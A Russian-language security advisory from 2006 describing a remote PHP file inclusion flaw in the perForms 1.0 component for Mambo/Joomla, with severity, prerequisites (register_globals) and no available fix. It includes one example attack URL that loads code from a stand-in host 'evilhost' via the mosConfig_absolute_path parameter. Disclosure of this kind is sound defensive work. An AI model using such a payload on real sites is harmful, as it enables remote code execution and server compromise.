PHP-инклюдинг в perForms

Дата публикации:
15.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
6371
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
perForms 1.x (компонент к Mambo / Joomla)
Уязвимые версии: perForms (компонент для Mambo / Joomla) 1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost

URL производителя: forge.joomla.org/sf/projects/performs

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

или введите имя

CAPTCHA